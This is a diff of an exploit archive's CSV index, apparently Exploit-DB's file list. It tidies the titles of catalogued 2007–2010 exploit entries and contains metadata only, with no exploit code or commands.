 3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a (root_prefix) Remote File Inclusion Vulnerabilities",2007-05-25,DeltahackingTEAM,php,webapps,0
 3992,platforms/php/webapps/3992.txt,"FlaP 1.0b (pachtofile) Remote File Inclusion Vulnerabilities",2007-05-25,"Mehmet Ince",php,webapps,0
-3993,platforms/windows/remote/3993.html,"IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module Remote BoF Exploit",2007-05-26,rgod,windows,remote,0
+3993,platforms/windows/remote/3993.html,"Internet Explorer 6 / Ademco, co., ltd. ATNBaseLoader100 Module Remote BoF Exploit",2007-05-26,rgod,windows,remote,0
 3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion Vulnerabilities",2007-05-26,"ThE TiGeR",php,webapps,0
 3995,platforms/php/webapps/3995.txt,"TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability",2007-05-26,"Mehmet Ince",php,webapps,0
 3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)",2007-05-26,fabio/b0x,windows,remote,80
@ -3673,7 +3673,7 @@ id,file,description,date,author,platform,type,port
 4020,platforms/php/webapps/4020.php,"RevokeBB <= 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0
 4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker ActiveX (sasatl.dll) Remote BoF Exploit",2007-06-01,shinnai,windows,remote,0
 4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion Exploit",2007-06-01,GoLd_M,php,webapps,0
-4023,platforms/windows/remote/4023.html,"IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit",2007-06-02,rgod,windows,remote,0
+4023,platforms/windows/remote/4023.html,"Internet Explorer 6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit",2007-06-02,rgod,windows,remote,0
 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0
 4025,platforms/php/webapps/4025.php,"Quick.Cart <= 2.2 RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0
 4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0
@ -3981,7 +3981,7 @@ id,file,description,date,author,platform,type,port
 4334,platforms/windows/remote/4334.txt,"MSN messenger 7.x (8.0?) VIDEO Remote Heap Overflow Exploit",2007-08-29,wushi,windows,remote,0
 4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit",2007-08-29,wushi,windows,dos,0
 4336,platforms/php/webapps/4336.txt,"xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability",2007-08-29,DarkFuneral,php,webapps,0
-4337,platforms/windows/dos/4337.c,"MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0
+4337,platforms/windows/dos/4337.c,"MS Windows - (GDI32.DLL) Denial of Service Exploit (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0
 4338,platforms/php/webapps/4338.pl,"ABC estore 3.0 (cat_id) Remote Blind SQL Injection Exploit",2007-08-29,k1tk4t,php,webapps,0
 4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 (shownews.php id) Remote SQL Injection Vulnerability",2007-08-29,SmOk3,php,webapps,0
 4340,platforms/php/webapps/4340.txt,"phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerabilities",2007-08-29,GoLd_M,php,webapps,0
@ -4227,7 +4227,7 @@ id,file,description,date,author,platform,type,port
 4581,platforms/php/webapps/4581.txt,"Sige 0.1 sige_init.php Remote File Inclusion Vulnerability",2007-10-28,GoLd_M,php,webapps,0
 4582,platforms/php/webapps/4582.txt,"teatro 1.6 (basePath) Remote File Include Vulnerability",2007-10-28,"Alkomandoz Hacker",php,webapps,0
 4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x (m3u File) Local Stack Overflow Exploit",2007-10-29,TaMBaRuS,windows,local,0
-4584,platforms/windows/local/4584.c,"Kodak Image Viewer TIF/TIFF Code Execution Exploit PoC (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0
+4584,platforms/windows/local/4584.c,"Kodak Image Viewer -TIF/TIFF Code Execution Exploit PoC (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0
 4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 RFI Vulnerability",2007-10-29,r00t@zapak.com,php,webapps,0
 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Remote File Upload Vulnerability Shell Upload Exploit",2007-10-29,r00t@zapak.com,php,webapps,0
 4587,platforms/php/webapps/4587.txt,"miniBB 2.1 (table) Remote SQL Injection Vulnerability",2007-10-30,irk4z,php,webapps,0
@ -4258,7 +4258,7 @@ id,file,description,date,author,platform,type,port
 4613,platforms/windows/dos/4613.html,"Adobe Shockwave ShockwaveVersion() Stack Overflow PoC",2007-11-08,Elazar,windows,dos,0
 4614,platforms/php/webapps/4614.txt,"jPORTAL <= 2.3.1 articles.php Remote SQL Injection Vulnerability",2007-11-09,Alexsize,php,webapps,0
 4615,platforms/multiple/dos/4615.txt,"MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability",2007-11-09,"Kristian Hermansen",multiple,dos,0
-4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0
+4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0
 4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln",2007-11-11,IRCRASH,php,webapps,0
 4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script ver 1 Remote SQL Injection Vuln",2007-11-11,IRCRASH,php,webapps,0
 4619,platforms/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection Vulnerability",2007-11-11,IRCRASH,php,webapps,0
@ -4387,7 +4387,7 @@ id,file,description,date,author,platform,type,port
 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow PoC",2007-12-18,r4x,windows,dos,0
 4743,platforms/php/webapps/4743.pl,"FreeWebshop <= 2.2.7 (cookie) Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0
 4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device (Goahead WEBSERVER) Disclosure Vulnerability",2007-12-18,NeoCoderz,hardware,remote,0
-4745,platforms/windows/remote/4745.cpp,"MS Windows Message Queuing Service RPC BOF Exploit (MS07-065)",2007-12-18,axis,windows,remote,0
+4745,platforms/windows/remote/4745.cpp,"MS Windows Message Queuing Service - RPC BOF Exploit (MS07-065)",2007-12-18,axis,windows,remote,0
 4746,platforms/windows/remote/4746.html,"RavWare Software MAS Flic Control Remote Buffer Overflow Exploit",2007-12-18,shinnai,windows,remote,0
 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit",2007-12-18,rgod,windows,remote,0
 4748,platforms/windows/dos/4748.php,"SurgeMail v.38k4 webmail Host header Denial of Service Exploit",2007-12-18,rgod,windows,dos,0
@ -4401,7 +4401,7 @@ id,file,description,date,author,platform,type,port
 4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0
 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability",2007-12-19,p4imi0,php,webapps,0
 4759,platforms/osx/local/4759.c,"Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit",2007-12-19,"Subreption LLC.",osx,local,0
-4760,platforms/windows/remote/4760.txt,"MS Windows 2000 AS SP4 Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
+4760,platforms/windows/remote/4760.txt,"MS Windows 2000 AS SP4 - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25
 4762,platforms/php/webapps/4762.txt,"nicLOR CMS (sezione_news.php) Remote SQL Injection Vulnerability",2007-12-21,x0kster,php,webapps,0
 4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 (output) Remote File Inclusion Vulnerability",2007-12-21,CraCkEr,php,webapps,0
@ -4742,7 +4742,7 @@ id,file,description,date,author,platform,type,port
 5104,platforms/php/webapps/5104.txt,"Joomla Component pcchess <= 0.8 - Remote SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
 5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit",2008-02-12,DNX,php,webapps,0
 5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client WFICA.OCX ActiveX - Heap BOF Exploit",2008-02-12,Elazar,windows,remote,0
-5107,platforms/windows/local/5107.c,"Microsoft Office .WPS File Stack Overflow Exploit (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0
+5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - .WPS File Stack Overflow Exploit (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0
 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 BETA - (language) Local File Inclusion Vulnerability",2008-02-13,GoLd_M,php,webapps,0
 5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0
 5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffiÃ© ",windows,dos,0
@ -4918,7 +4918,7 @@ id,file,description,date,author,platform,type,port
 5283,platforms/linux/remote/5283.txt,"CenterIM <= 4.22.3 - Remote Command Execution Vulnerability",2008-03-20,"Brian Fonfara",linux,remote,0
 5285,platforms/php/webapps/5285.txt,"RunCMS Module section (artid) Remote SQL Injection Vulnerability",2008-03-20,Cr@zy_King,php,webapps,0
 5286,platforms/php/webapps/5286.txt,"ASPapp Knowledge Base Remote SQL Injection Vulnerability",2008-03-20,xcorpitx,php,webapps,0
-5287,platforms/windows/local/5287.txt,"Microsoft Office Excel Code Execution Exploit (MS08-014)",2008-03-21,zha0,windows,local,0
+5287,platforms/windows/local/5287.txt,"Microsoft Office Excel - Code Execution Exploit (MS08-014)",2008-03-21,zha0,windows,local,0
 5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 Multiple Local File Inclusion Vulnerabilities",2008-03-21,0x90,php,webapps,0
 5289,platforms/hardware/remote/5289.txt,"ZyXEL ZyWALL Quagga/Zebra (default pass) Remote Root Vulnerability",2008-03-21,"Pranav Joshi",hardware,remote,0
 5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability",2008-03-21,S@BUN,php,webapps,0
@ -4951,7 +4951,7 @@ id,file,description,date,author,platform,type,port
 5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities",2008-03-26,CraCkEr,php,webapps,0
 5318,platforms/php/webapps/5318.txt,"Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability",2008-03-28,parad0x,php,webapps,0
 5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0
-5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 PPT File Buffer Overflow Exploit (ms08-016)",2008-03-30,Marsu,windows,local,0
+5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - PPT File Buffer Overflow Exploit (MS08-016)",2008-03-30,Marsu,windows,local,0
 5321,platforms/windows/dos/5321.txt,"Visual Basic (vbe6.dll) Local Stack Overflow PoC / DoS",2008-03-30,Marsu,windows,dos,0
 5322,platforms/php/webapps/5322.txt,"Smoothflash (admin_view_image.php cid) SQL Injection Vulnerability",2008-03-30,S@BUN,php,webapps,0
 5323,platforms/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta Remote File Inclusion Exploit",2008-03-30,bd0rk,php,webapps,0
@ -5072,7 +5072,7 @@ id,file,description,date,author,platform,type,port
 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling Vulnerability",2008-04-13,t0pP8uZz,php,webapps,0
 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit",2008-04-13,Lidloses_Auge,php,webapps,0
 5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS Remote SQL Injection Vulnerability",2008-04-14,cO2,php,webapps,0
-5442,platforms/windows/local/5442.cpp,"MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0
+5442,platforms/windows/local/5442.cpp,"MS Windows GDI - Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0
 5443,platforms/php/webapps/5443.txt,"SmallBiz eShop (content_id) Remote SQL Injection Vulnerability",2008-04-14,Stack,php,webapps,0
 5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability",2008-04-14,"SoSo H H",php,webapps,0
 5445,platforms/windows/remote/5445.cpp,"HP OpenView NNM 7.5.1 - ovalarmsrv.exe Remote Overflow Exploit",2008-04-14,Heretic2,windows,remote,2954
@ -5148,7 +5148,7 @@ id,file,description,date,author,platform,type,port
 5515,platforms/windows/dos/5515.txt,"GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC",2008-04-28,"Juan Yacubian",windows,dos,0
 5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index (directory.php cat_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0
 5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0
-5518,platforms/windows/local/5518.txt,"MS Windows XP SP2 (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0
+5518,platforms/windows/local/5518.txt,"MS Windows XP SP2 - (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0
 5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String Exploit",2008-04-28,EpiBite,windows,remote,0
 5520,platforms/php/webapps/5520.txt,"Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability",2008-04-28,HaCkeR_EgY,php,webapps,0
 5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 File Disclosure Vulnerability",2008-04-29,"Roberto Suggi Liverani",php,webapps,0
@ -6027,7 +6027,7 @@ id,file,description,date,author,platform,type,port
 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion/PHPInfo Disclosure Vulns",2008-09-13,SirGod,php,webapps,0
 6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 (lfi/sql) Multiple Vulnerabilities",2008-09-13,r3dm0v3,php,webapps,0
 6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b (oyun) Remote SQL Injection Vulnerability",2008-09-13,Crackers_Child,asp,webapps,0
-6454,platforms/windows/remote/6454.html,"Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0
+6454,platforms/windows/remote/6454.html,"Windows Media Encoder XP SP2 - wmex.dll ActiveX BOF Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0
 6455,platforms/php/webapps/6455.txt,"Linkarity (link.php) Remote SQL Injection Vulnerability",2008-09-13,"Egypt Coder",php,webapps,0
 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 Arbitrary Database Backup Vulnerability",2008-09-13,SirGod,php,webapps,0
 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability",2008-09-14,Stack,php,webapps,0
@ -6224,7 +6224,7 @@ id,file,description,date,author,platform,type,port
 6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 (infile) Local File Inclusion Vulnerability",2008-10-02,ZeN,php,webapps,0
 6654,platforms/windows/dos/6654.pl,"mIRC 6.34 Remote Buffer Overflow PoC",2008-10-02,securfrog,windows,dos,0
 6655,platforms/php/webapps/6655.php,"OpenX 2.6 (ac.php bannerid) Remote Blind SQL Injection Exploit",2008-10-02,d00m3r4ng,php,webapps,0
-6656,platforms/windows/remote/6656.txt,"MS Windows GDI (EMR_COLORMATCHTOTARGETW) Exploit MS08-021",2008-10-02,Ac!dDrop,windows,remote,0
+6656,platforms/windows/remote/6656.txt,"MS Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0
 6657,platforms/php/webapps/6657.pl,"IP Reg <= 0.4 - Remote Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0
 6658,platforms/windows/dos/6658.txt,"VBA32 Personal Antivirus 3.12.8.x (malformed archive) DoS Exploit",2008-10-03,LiquidWorm,windows,dos,0
 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script (arsaprint.php id) SQL Injection Vulnerability",2008-10-03,"Hussin X",php,webapps,0
@ -6297,7 +6297,7 @@ id,file,description,date,author,platform,type,port
 6729,platforms/php/webapps/6729.php,"SlimCMS <= 1.0.0 (redirect.php) Privilege Escalation Exploit",2008-10-10,StAkeR,php,webapps,0
 6730,platforms/php/webapps/6730.txt,"Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0
 6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 (xlacomments.asp) SQL Injection Vuln",2008-10-11,Hakxer,asp,webapps,0
-6732,platforms/windows/dos/6732.txt,"MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0
+6732,platforms/windows/dos/6732.txt,"MS Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0
 6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 (lfd/ce) Multiple Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0
 6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure Vulnerabilities",2008-10-12,GoLd_M,php,webapps,0
 6735,platforms/php/webapps/6735.php,"Globsy <= 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0
@ -6387,7 +6387,7 @@ id,file,description,date,author,platform,type,port
 6821,platforms/php/webapps/6821.txt,"miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities",2008-10-23,StAkeR,php,webapps,0
 6822,platforms/php/webapps/6822.txt,"websvn <= 2.0 (xss/fh/ce) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0
 6823,platforms/php/webapps/6823.txt,"siteengine 5.x Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0
-6824,platforms/windows/dos/6824.txt,"MS Windows Server Service Code Execution PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
+6824,platforms/windows/dos/6824.txt,"MS Windows Server Service - Code Execution PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
 6825,platforms/windows/local/6825.pl,"VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)",2008-10-23,"Guido Landi",windows,local,0
 6826,platforms/php/webapps/6826.txt,"joomla component archaic binary gallery 0.2 - Directory Traversal vuln",2008-10-24,H!tm@N,php,webapps,0
 6827,platforms/php/webapps/6827.txt,"Joomla Component Kbase 1.0 - Remote SQL Injection Vulnerability",2008-10-24,H!tm@N,php,webapps,0
@ -6404,7 +6404,7 @@ id,file,description,date,author,platform,type,port
 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service Exploit (meta)",2008-10-25,"Saint Patrick",windows,dos,0
 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions (gotourl.php id) SQL Injection Vuln",2008-10-26,"Hussin X",php,webapps,0
 6840,platforms/windows/remote/6840.html,"PowerTCP FTP module Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0
-6841,platforms/windows/remote/6841.txt,"MS Windows Server Service Code Execution Exploit (MS08-067) (Univ)",2008-10-26,EMM,windows,remote,135
+6841,platforms/windows/remote/6841.txt,"MS Windows Server Service - Code Execution Exploit (MS08-067) (Univ)",2008-10-26,EMM,windows,remote,135
 6842,platforms/php/webapps/6842.txt,"WordPress Media Holder (mediaHolder.php id) SQL Injection Vuln",2008-10-26,boom3rang,php,webapps,0
 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum (forum.php id) SQL Injection Vulnerability",2008-10-26,Hurley,php,webapps,0
 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 (lecture.php id) Remote SQL Injection Exploit",2008-10-26,Vrs-hCk,php,webapps,0
@ -6742,7 +6742,7 @@ id,file,description,date,author,platform,type,port
 7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0
 7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit",2008-11-22,cOndemned,php,webapps,0
 7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index (id) Remote SQL Injection Vulnerability",2008-11-23,snakespc,php,webapps,0
-7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069",2008-11-23,"Jerome Athias",windows,remote,0
+7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0
 7197,platforms/php/webapps/7197.txt,"Goople Cms 1.7 - Remote File Upload Vulnerability",2008-11-23,x0r,php,webapps,0
 7198,platforms/php/webapps/7198.txt,"NetArtMedia Cars Portal 2.0 (image.php id) SQL Injection Vulnerability",2008-11-23,snakespc,php,webapps,0
 7199,platforms/php/webapps/7199.txt,"NetArtMedia Blog System (image.php id) SQL Injection Vulnerability",2008-11-23,snakespc,php,webapps,0
@ -7602,10 +7602,10 @@ id,file,description,date,author,platform,type,port
 8074,platforms/multiple/local/8074.rb,"Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL Injection Exploit (meta)",2009-02-18,sh2kerr,multiple,local,0
 8075,platforms/php/webapps/8075.pl,"Firepack (admin/ref.php) Remote Code Execution Exploit",2009-02-18,Lidloses_Auge,php,webapps,0
 8076,platforms/php/webapps/8076.txt,"smNews 1.0 Auth Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0
-8077,platforms/windows/dos/8077.html,"MS Internet Explorer 7 Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0
+8077,platforms/windows/dos/8077.html,"MS Internet Explorer 7 - Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0
-8079,platforms/windows/remote/8079.html,"MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (xp sp2)",2009-02-20,Abysssec,windows,remote,0
+8079,platforms/windows/remote/8079.html,"MS Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0
-8080,platforms/windows/remote/8080.py,"MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
+8080,platforms/windows/remote/8080.py,"MS Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
-8082,platforms/windows/remote/8082.html,"MS Internet Explorer 7 Memory Corruption PoC (MS09-002) (win2k3sp2)",2009-02-20,webDEViL,windows,remote,0
+8082,platforms/windows/remote/8082.html,"MS Internet Explorer 7 - Memory Corruption PoC (MS09-002) (win2k3sp2)",2009-02-20,webDEViL,windows,remote,0
 8083,platforms/php/webapps/8083.txt,"phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0
 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 (t00t) Remote Denial of Service Exploit",2009-02-20,LiquidWorm,windows,dos,0
 8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0
@ -7670,7 +7670,7 @@ id,file,description,date,author,platform,type,port
 8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass Vulnerability",2009-03-03,Stack,windows,remote,0
 8150,platforms/php/webapps/8150.txt,"NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability",2009-03-03,Pepelux,php,webapps,0
 8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability",2009-03-03,kecemplungkalen,php,webapps,0
-8152,platforms/windows/remote/8152.py,"MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (fast)",2009-03-04,"Ahmed Obied",windows,remote,0
+8152,platforms/windows/remote/8152.py,"MS Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (Fast)",2009-03-04,"Ahmed Obied",windows,remote,0
 8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)",2009-03-04,Dr4sH,windows,remote,80
 8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 File Disclosure Vulnerability",2009-03-04,Stack,windows,remote,0
 8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption PoC",2009-03-04,Stack,windows,dos,0
@ -9165,7 +9165,7 @@ id,file,description,date,author,platform,type,port
 9706,platforms/php/webapps/9706.txt,"joomla component com_album 1.14 - Directory Traversal vulnerability",2009-09-17,DreamTurk,php,webapps,0
 9707,platforms/windows/dos/9707.pl,"Ease Audio Cutter 1.20 (.wav file) Local Crash PoC",2009-09-17,zAx,windows,dos,0
 9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b (pageHeader.php path) RFI Vulnerability",2009-09-17,"EA Ngel",php,webapps,0
-9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 Local Privilege Escalation Vulnerability",2009-09-17,Rick,linux,local,0
+9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 - Local Privilege Escalation Vulnerability",2009-09-17,Rick,linux,local,0
 9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x (itemid) Remote SQL Injection Vulnerability",2009-09-17,"learn3r hacker",php,webapps,0
 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injection Vulnerabilities",2009-09-17,"learn3r hacker",php,webapps,0
 9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 (Auth Bypass) SQL Injection Vulnerability",2009-09-17,"learn3r hacker",php,webapps,0
@ -10222,7 +10222,7 @@ id,file,description,date,author,platform,type,port
 11148,platforms/php/webapps/11148.txt,"PonVFTP Bypass and Shell Upload Vulnerability",2010-01-15,S2K9,php,webapps,0
 11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - (.rt) Local Buffer Overflow PoC",2010-01-15,"fl0 fl0w",windows,dos,0
 11150,platforms/windows/dos/11150.txt,"Aqua Real 1.0 & 2.0 - Local Crash PoC",2010-01-15,R3d-D3V!L,windows,dos,0
-11151,platforms/windows/remote/11151.html,"IE wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0
+11151,platforms/windows/remote/11151.html,"Internet Explorer wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0
 11152,platforms/windows/local/11152.py,"Google SketchUp <= 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0
 11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow Exploit",2010-01-16,Dz_attacker,windows,local,0
 11155,platforms/php/webapps/11155.txt,"Transload Script Upload Vulnerability",2010-01-16,DigitALL,php,webapps,0
@ -10288,7 +10288,7 @@ id,file,description,date,author,platform,type,port
 11226,platforms/php/webapps/11226.txt,"Joomla Component com_biographies SQL injection Vulnerability",2010-01-22,snakespc,php,webapps,0
 11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 (.mp3) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0
 11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 (.mp3 /.pls File) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0
-11229,platforms/windows/local/11229.txt,"IE wshom.ocx (Run) ActiveX Remote Code Execution (add admin user)",2010-01-22,Stack,windows,local,0
+11229,platforms/windows/local/11229.txt,"Internet Explorer wshom.ocx (Run) ActiveX Remote Code Execution (add admin user)",2010-01-22,Stack,windows,local,0
